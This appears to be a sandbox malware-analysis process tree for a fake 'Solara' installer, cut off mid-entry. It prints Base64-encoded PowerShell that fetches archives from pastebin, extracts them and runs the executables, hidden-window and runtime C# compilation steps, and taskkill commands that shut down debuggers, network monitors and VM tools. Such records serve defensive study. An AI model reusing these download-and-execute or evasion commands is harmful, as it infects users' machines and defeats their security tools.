  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand CgAkAGEAcABwAEQAYQB0AGEAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQAgACcAVwBpAG4AZABvAHcAcwBUAGEAcwBrAHMAXABBAHAAcAAtAEQAYQB0AGEAJwAKAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGEAcABwAEQAYQB0AGEAUABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACQAegBpAHAAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAYQBwAHAARABhAHQAYQBQAGEAdABoACAAJwBrAG0AbgBiAHYAZgAuAHoAaQBwACcACgAkAGUAeABlAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGEAcABwAEQAYQB0AGEAUABhAHQAaAAgACcAZQBiAC4AZQB4AGUAJwAKAAoAJAB1AHIAbABGAGkAbABlACAAPQAgACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBwAHMAYwBIAFgAaQBOAGgAJwAKACQAdQByAGwAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwARgBpAGwAZQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAQwBvAG4AdABlAG4AdAAKAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHoAaQBwAFAAYQB0AGgACgAKAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEYAaQBsAGUAUwB5AHMAdABlAG0ACgBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AWgBpAHAARgBpAGwAZQBdADoAOgBFAHgAdAByAGEAYwB0AFQAbwBEAGkAcgBlAGMAdABvAHIAeQAoACQAegBpAHAAUABhAHQAaAAsACAAJABhAHAAcABEAGEAdABhAFAAYQB0AGgAKQAKAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABlAHgAZQBQAGEAdABoACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAbwB1AG4AZwBhAG8AcwAKAAoAJABsAG8AYwBhAGwARABhAHQAYQBQAGEAdABoACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACAAJwBXAGkAbgBkAG8AdwBzAFAAcgBvAGMAZQBzAHMAXABMAG8AYwBhAGwALQBEAGEAdABhACcACgBOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABsAG8AYwBhAGwARABhAHQAYQBQAGEAdABoACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJAB6AGkAcABQAGEAdABoADIAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGwAbwBjAGEAbABEAGEAdABhAFAAYQB0AGgAIAAnAGsAbQBuAGIAdgBmAGQALgB6AGkAcAAnAAoAJABlAHgAZQBQAGEAdABoADIAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGwAbwBjAGEAbABEAGEAdABhAFAAYQB0AGgAIAAnAHMAeQBzAHQAZQBtAC4AZQB4AGUAJwAKAAoAJAB1AHIAbABGAGkAbABlADIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHkAcgBqAE4AQgBQAFcAWAAnAAoAJAB1AHIAbAAyACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsAEYAaQBsAGUAMgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAQwBvAG4AdABlAG4AdAAKAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMgAgAC0ATwB1AHQARgBpAGwAZQAgACQAegBpAHAAUABhAHQAaAAyAAoACgBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AWgBpAHAARgBpAGwAZQBdADoAOgBFAHgAdAByAGEAYwB0AFQAbwBEAGkAcgBlAGMAdABvAHIAeQAoACQAegBpAHAAUABhAHQAaAAyACwAIAAkAGwAbwBjAGEAbABEAGEAdABhAFAAYQB0AGgAKQAKAAoAIwAgAEUAagBlAGMAdQB0AGEAIABlAGwAIABlAHgAZQAgAGQAZQBzAGQAZQAgAEwAbwBjAGEAbABBAHAAcABEAGEAdABhAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABlAHgAZQBQAGEAdABoADIAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAeQBvAHUAbgBnAGEAbwBzAAoAIAAgACAAIAA="
  2⤵
  PID:5564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand CgAkAGEAcABwAEQAYQB0AGEAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQAgACcAVwBpAG4AZABvAHcAcwBUAGEAcwBrAHMAXABBAHAAcAAtAEQAYQB0AGEAJwAKAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGEAcABwAEQAYQB0AGEAUABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACQAegBpAHAAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAYQBwAHAARABhAHQAYQBQAGEAdABoACAAJwBrAG0AbgBiAHYAZgAuAHoAaQBwACcACgAkAGUAeABlAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGEAcABwAEQAYQB0AGEAUABhAHQAaAAgACcAZQBiAC4AZQB4AGUAJwAKAAoAJAB1AHIAbABGAGkAbABlACAAPQAgACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBwAHMAYwBIAFgAaQBOAGgAJwAKACQAdQByAGwAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwARgBpAGwAZQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAQwBvAG4AdABlAG4AdAAKAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHoAaQBwAFAAYQB0AGgACgAKAEEAZABkAC0AVAB5AHAAZQAgAC0AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEYAaQBsAGUAUwB5AHMAdABlAG0ACgBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AWgBpAHAARgBpAGwAZQBdADoAOgBFAHgAdAByAGEAYwB0AFQAbwBEAGkAcgBlAGMAdABvAHIAeQAoACQAegBpAHAAUABhAHQAaAAsACAAJABhAHAAcABEAGEAdABhAFAAYQB0AGgAKQAKAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABlAHgAZQBQAGEAdABoACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAbwB1AG4AZwBhAG8AcwAKAAoAJABsAG8AYwBhAGwARABhAHQAYQBQAGEAdABoACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACAAJwBXAGkAbgBkAG8AdwBzAFAAcgBvAGMAZQBzAHMAXABMAG8AYwBhAGwALQBEAGEAdABhACcACgBOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABsAG8AYwBhAGwARABhAHQAYQBQAGEAdABoACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJAB6AGkAcABQAGEAdABoADIAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGwAbwBjAGEAbABEAGEAdABhAFAAYQB0AGgAIAAnAGsAbQBuAGIAdgBmAGQALgB6AGkAcAAnAAoAJABlAHgAZQBQAGEAdABoADIAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGwAbwBjAGEAbABEAGEAdABhAFAAYQB0AGgAIAAnAHMAeQBzAHQAZQBtAC4AZQB4AGUAJwAKAAoAJAB1AHIAbABGAGkAbABlADIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHkAcgBqAE4AQgBQAFcAWAAnAAoAJAB1AHIAbAAyACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsAEYAaQBsAGUAMgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAQwBvAG4AdABlAG4AdAAKAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMgAgAC0ATwB1AHQARgBpAGwAZQAgACQAegBpAHAAUABhAHQAaAAyAAoACgBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AWgBpAHAARgBpAGwAZQBdADoAOgBFAHgAdAByAGEAYwB0AFQAbwBEAGkAcgBlAGMAdABvAHIAeQAoACQAegBpAHAAUABhAHQAaAAyACwAIAAkAGwAbwBjAGEAbABEAGEAdABhAFAAYQB0AGgAKQAKAAoAIwAgAEUAagBlAGMAdQB0AGEAIABlAGwAIABlAHgAZQAgAGQAZQBzAGQAZQAgAEwAbwBjAGEAbABBAHAAcABEAGEAdABhAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABlAHgAZQBQAGEAdABoADIAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAeQBvAHUAbgBnAGEAbwBzAAoAIAAgACAAIAA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1092

C:\Users\Admin\Downloads\SolaraInstaller\Solara_Installer.exe
"C:\Users\Admin\Downloads\SolaraInstaller\Solara_Installer.exe"
1⤵
PID:5688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA"
  2⤵
  PID:5756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5736
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vro01lub\vro01lub.cmdline"
      4⤵
      PID:6080
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D27.tmp" "c:\Users\Admin\AppData\Local\Temp\vro01lub\CSC6498EFC9A157426DB2E6A486B9F324AD.TMP"
        5⤵
        
        PID:836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM httpdebuggerui.exe /F"
  2⤵
  PID:5820
- - C:\Windows\system32\taskkill.exe
    taskkill /IM httpdebuggerui.exe /F
    3⤵
    - Kills process with taskkill
    PID:5784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM wireshark.exe /F"
  2⤵
  PID:5892
- - C:\Windows\system32\taskkill.exe
    taskkill /IM wireshark.exe /F
    3⤵
    - Kills process with taskkill
    PID:5868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM fiddler.exe /F"
  2⤵
  PID:5916
- - C:\Windows\system32\taskkill.exe
    taskkill /IM fiddler.exe /F
    3⤵
    - Kills process with taskkill
    PID:5984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM regedit.exe /F"
  2⤵
  PID:5956
- - C:\Windows\system32\taskkill.exe
    taskkill /IM regedit.exe /F
    3⤵
    - Kills process with taskkill
    PID:6028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM cmd.exe /F"
  2⤵
  PID:6076
- - C:\Windows\system32\taskkill.exe
    taskkill /IM cmd.exe /F
    3⤵
    - Kills process with taskkill
    PID:6116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM taskmgr.exe /F"
  2⤵
  PID:1176
- - C:\Windows\system32\taskkill.exe
    taskkill /IM taskmgr.exe /F
    3⤵
    - Kills process with taskkill
    PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vboxservice.exe /F"
  2⤵
  PID:5200
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vboxservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM df5serv.exe /F"
  2⤵
  PID:5228
- - C:\Windows\system32\taskkill.exe
    taskkill /IM df5serv.exe /F
    3⤵
    - Kills process with taskkill
    PID:5168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM processhacker.exe /F"
  2⤵
  PID:5284
- - C:\Windows\system32\taskkill.exe
    taskkill /IM processhacker.exe /F
    3⤵
    - Kills process with taskkill
    PID:5212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vboxtray.exe /F"
  2⤵
  PID:3976
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vboxtray.exe /F
    3⤵
    - Kills process with taskkill
    PID:5268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vmtoolsd.exe /F"
  2⤵
  PID:5336
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmtoolsd.exe /F
    3⤵
    - Kills process with taskkill
    PID:5472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vmwaretray.exe /F"
  2⤵
  PID:5440
- - C:\Windows\system32\taskkill.exe
    taskkill /IM vmwaretray.exe /F
    3⤵
    - Kills process with taskkill
    PID:5428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM ida64.exe /F"
  2⤵
  PID:5364
- - C:\Windows\system32\taskkill.exe
